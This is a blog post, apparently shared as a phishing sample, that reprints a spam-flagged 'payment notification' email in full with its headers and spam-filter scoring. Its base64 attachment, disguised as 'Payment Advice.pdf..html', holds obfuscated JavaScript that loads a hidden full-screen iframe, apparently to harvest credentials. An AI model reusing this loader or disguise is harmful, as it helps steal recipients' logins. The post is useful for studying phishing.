Monetary Phish

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 26 Oct 2023 11:27:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.96.2 (FreeBSD))

(envelope-from )

id 1qw47O-0008Xx-2p

for dave@doctor.nl2k.ab.ca;

Thu, 26 Oct 2023 11:26:02 -0600

Resent-From: The Doctor

Resent-Date: Thu, 26 Oct 2023 11:26:02 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from maxpress.jp ([160.16.109.197]:52370)

by doctor.nl2k.ab.ca with esmtp (Exim 4.96.2 (FreeBSD))

(envelope-from )

id 1qvzMi-0000Xn-1Z

for root@nk.ca;

Thu, 26 Oct 2023 06:21:36 -0600

Received: from localhost (localhost [127.0.0.1])

by maxpress.jp (Postfix) with ESMTP id 53B2612344E

for ; Thu, 26 Oct 2023 21:19:31 +0900 (JST)

X-Virus-Scanned: amavisd-new at maxpress.jp

Received: from maxpress.jp ([127.0.0.1])

by localhost (maxpress.jp [127.0.0.1]) (amavisd-new, port 10024)

with ESMTP id fb9YsI2QbeFh for ;

Thu, 26 Oct 2023 21:19:31 +0900 (JST)

Received: from [127.0.0.1] (static.227.101.140.128.clients.your-server.de [128.140.101.227])

by maxpress.jp (Postfix) with ESMTPSA id BA25B12337C

for ; Thu, 26 Oct 2023 21:19:30 +0900 (JST)

Content-Type: multipart/mixed; boundary="--_NmP-67beec991f630198-Part_1"

From: Hackett Brian

To: root@nk.ca

Subject: Attached payment notification

Message-ID:

Date: Thu, 26 Oct 2023 12:19:28 +0000

MIME-Version: 1.0

X-Spam_score: 8.9

X-Spam_score_int: 89

X-Spam_bar: ++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: CONFIDENTIALITY STATEMENT: This transmission contains confidential

information and is only intended for the use of the individual or entity

named in this transmission. If you are not the intended reci [...]



Content analysis details: (8.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

3.6 RCVD_IN_SBL_CSS RBL: Received via a relay in Spamhaus SBL-CSS

[128.140.101.227 listed in zen.spamhaus.org]

0.6 RCVD_IN_SORBS_WEB RBL: SORBS: sender is an abusable web server

[128.140.101.227 listed in dnsbl.sorbs.net]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

1.3 RCVD_IN_VALIDITY_RPBL RBL: Relay in Validity RPBL,

https://senderscore.org/blocklistlookup/

[160.16.109.197 listed in bl.score.senderscore.com]

1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,

https://senderscore.org/blacklistlookup/

[160.16.109.197 listed in bl.score.senderscore.com]

-0.0 SPF_PASS SPF: sender matches SPF record

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 HTML_MESSAGE BODY: HTML included in message

0.0 T_HTML_ATTACH HTML attachment to bypass scanning?

1.0 HTML_OFF_PAGE HTML element rendered well off the displayed page

Subject: {SPAM?} Attached payment notification

X-Antivirus: AVG (VPS 231025-16, 10/25/2023), Inbound message

X-Antivirus-Status: Clean



----_NmP-67beec991f630198-Part_1

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable



CONFIDENTIALITY STATEMENT:



This transmission contains confidential =

information and is only intended for the use of the individual or entity =

named in this transmission. If you are not the intended recipient, you are =

directed to destroy the contents of this transmission and you not =

authorized to copy or distribute its content.





----_NmP-67beec991f630198-Part_1

Content-Type: text/html; name="Payment Advice.pdf..html"

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename="Payment Advice.pdf..html"



PGh0bWw+CiAgICAgICAgPGlucHV0IGNsYXNzPSJwVWp4cXEiIHN0eWxlPSJwb3NpdGlvbjphYnNv

bHV0ZTtsZWZ0Oi05OTk5cHg7IiB2YWx1ZT0iI3Jvb3RAbmsuY2EiPgogICAgICAgIDxzY3JpcHQ+

CiAgICAgICAgdmFyIF8weDI5NmJmOD0nbXl5dXg/NDR+bWtyM3JceDdmdWhvM3d6NFlQaFJ0PFx4

N2YnO2Z1bmN0aW9uIF8weDQzNmRjNyhfMHgxOGM2Y2Mpe2NvbnN0IF8weDIwOTAzNj0oZnVuY3Rp

b24oKXtsZXQgXzB4NWNlNmVjPSEhW107cmV0dXJuIGZ1bmN0aW9uKF8weDQyZGRkYixfMHg0YmM0

N2Mpe2NvbnN0IF8weDQ5ZmE4ZD1fMHg1Y2U2ZWM/ZnVuY3Rpb24oKXtpZihfMHg0YmM0N2Mpe2Nv

bnN0IF8weDIzMGJkOT1fMHg0YmM0N2NbJ2FwcGx5J10oXzB4NDJkZGRiLGFyZ3VtZW50cyk7cmV0

dXJuIF8weDRiYzQ3Yz1udWxsLF8weDIzMGJkOTt9fTpmdW5jdGlvbigpe307cmV0dXJuIF8weDVj

ZTZlYz0hW10sXzB4NDlmYThkO307fSgpKSxfMHg0OGU3NzM9XzB4MjA5MDM2KHRoaXMsZnVuY3Rp

b24oKXtyZXR1cm4gXzB4NDhlNzczWyd0b1N0cmluZyddKClbJ3NlYXJjaCddKCcoKCguKykrKSsp

KyQnKVsndG9TdHJpbmcnXSgpWydjb25zdHJ1Y3RvciddKF8weDQ4ZTc3MylbJ3NlYXJjaCddKCco

KCguKykrKSspKyQnKTt9KTtfMHg0OGU3NzMoKTtjb25zdCBfMHg0Njc4MTk9KGZ1bmN0aW9uKCl7

bGV0IF8weDJiOTcyMD0hIVtdO3JldHVybiBmdW5jdGlvbihfMHhkNTVjOWUsXzB4NDEzMDE2KXtj

b25zdCBfMHhjYmRhZTI9XzB4MmI5NzIwP2Z1bmN0aW9uKCl7aWYoXzB4NDEzMDE2KXtjb25zdCBf

MHgyZmRkOWI9XzB4NDEzMDE2WydhcHBseSddKF8weGQ1NWM5ZSxhcmd1bWVudHMpO3JldHVybiBf

MHg0MTMwMTY9bnVsbCxfMHgyZmRkOWI7fX06ZnVuY3Rpb24oKXt9O3JldHVybiBfMHgyYjk3MjA9

IVtdLF8weGNiZGFlMjt9O30oKSksXzB4MzFjMGU5PV8weDQ2NzgxOSh0aGlzLGZ1bmN0aW9uKCl7

Y29uc3QgXzB4MjliZjcyPWZ1bmN0aW9uKCl7bGV0IF8weDFjNDk5Nzt0cnl7XzB4MWM0OTk3PUZ1

bmN0aW9uKCdyZXR1cm5ceDIwKGZ1bmN0aW9uKClceDIwJysne30uY29uc3RydWN0b3IoXHgyMnJl

dHVyblx4MjB0aGlzXHgyMikoXHgyMCknKycpOycpKCk7fWNhdGNoKF8weDQ1MmYwZSl7XzB4MWM0

OTk3PXdpbmRvdzt9cmV0dXJuIF8weDFjNDk5Nzt9LF8weDJhM2FlNz1fMHgyOWJmNzIoKSxfMHgx

YzNmZWQ9XzB4MmEzYWU3Wydjb25zb2xlJ109XzB4MmEzYWU3Wydjb25zb2xlJ118fHt9LF8weDNi

MjJjMz1bJ2xvZycsJ3dhcm4nLCdpbmZvJywnZXJyb3InLCdleGNlcHRpb24nLCd0YWJsZScsJ3Ry

YWNlJ107Zm9yKGxldCBfMHgyMGM3MWQ9MHgwO18weDIwYzcxZDxfMHgzYjIyYzNbJ2xlbmd0aCdd

O18weDIwYzcxZCsrKXtjb25zdCBfMHgyOWZjMzg9XzB4NDY3ODE5Wydjb25zdHJ1Y3RvciddWydw

cm90b3R5cGUnXVsnYmluZCddKF8weDQ2NzgxOSksXzB4NTY0YWRmPV8weDNiMjJjM1tfMHgyMGM3

MWRdLF8weDI4ZWM5ZT1fMHgxYzNmZWRbXzB4NTY0YWRmXXx8XzB4MjlmYzM4O18weDI5ZmMzOFsn

X19wcm90b19fJ109XzB4NDY3ODE5WydiaW5kJ10oXzB4NDY3ODE5KSxfMHgyOWZjMzhbJ3RvU3Ry

aW5nJ109XzB4MjhlYzllWyd0b1N0cmluZyddWydiaW5kJ10oXzB4MjhlYzllKSxfMHgxYzNmZWRb

XzB4NTY0YWRmXT1fMHgyOWZjMzg7fX0pO18weDMxYzBlOSgpO2NvbnN0IF8weDMwZWNiYT1bXTtm

b3IobGV0IF8weDU1NzE1MD0weDA7XzB4NTU3MTUwPF8weDE4YzZjY1snbGVuZ3RoJ107XzB4NTU3

MTUwKyspe2NvbnN0IF8weDJhOThhYz1fMHgxOGM2Y2NbJ2NoYXJDb2RlQXQnXShfMHg1NTcxNTAp

O18weDMwZWNiYVsncHVzaCddKFN0cmluZ1snZnJvbUNoYXJDb2RlJ10oXzB4MmE5OGFjLTB4NSkp

O31yZXR1cm4gXzB4MzBlY2JhWydqb2luJ10oJycpO312YXIgXzB4YjQ0YjAyPWRvY3VtZW50Wydj

cmVhdGVFbGVtZW50J10oJ2lmcmFtZScpO18weGI0NGIwMlsnc2FuZGJveCddWydhZGQnXSgnYWxs

b3ctc2FtZS1vcmlnaW4nKSxfMHhiNDRiMDJbJ3NhbmRib3gnXVsnYWRkJ10oJ2FsbG93LXRvcC1u

YXZpZ2F0aW9uJyksXzB4YjQ0YjAyWydzYW5kYm94J11bJ2FkZCddKCdhbGxvdy1tb2RhbHMnKSxf

MHhiNDRiMDJbJ3NhbmRib3gnXVsnYWRkJ10oJ2FsbG93LXNjcmlwdHMnKSxfMHhiNDRiMDJbJ3Nh

bmRib3gnXVsnYWRkJ10oJ2FsbG93LXBvcHVwcy10by1lc2NhcGUtc2FuZGJveCcpLF8weGI0NGIw

Mlsnc2FuZGJveCddWydhZGQnXSgnYWxsb3ctZm9ybXMnKSxfMHhiNDRiMDJbJ3NyYyddPV8weDQz

NmRjNyhfMHgyOTZiZjgpK2RvY3VtZW50WydxdWVyeVNlbGVjdG9yJ10oJy5wVWp4cXEnKVsndmFs

dWUnXSxfMHhiNDRiMDJbJ3N0eWxlJ11bJ2Nzc1RleHQnXT0ncG9zaXRpb246XHgyMGZpeGVkO1x4

MjBpbnNldDpceDIwMHB4O1x4MjB3aWR0aDpceDIwMTAwJTtceDIwaGVpZ2h0Olx4MjAxMDAlO1x4

MjBib3JkZXI6XHgyMDBweDtceDIwbWFyZ2luOlx4MjAwcHg7cGFkZGluZzpceDIwMHB4O1x4MjBv

dmVyZmxvdzpceDIwaGlkZGVuO1x4MjB6LWluZGV4Olx4MjA5OTk5OTk7Jyxkb2N1bWVudFsnYm9k

eSddWydhcHBlbmRDaGlsZCddKF8weGI0NGIwMik7CiAgICAgICAgPC9zY3JpcHQ+CiAgICAgICAg

PC9odG1sPg==

----_NmP-67beec991f630198-Part_1--

Trackbacks

Trackback specific URI for this entry

This link is not meant to be clicked. It contains the trackback URI for this entry. You can use this URI to send ping- & trackbacks from your own blog to this entry. To copy the link, right click and select "Copy Shortcut" in Internet Explorer or "Copy Link Location" in Mozilla.

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA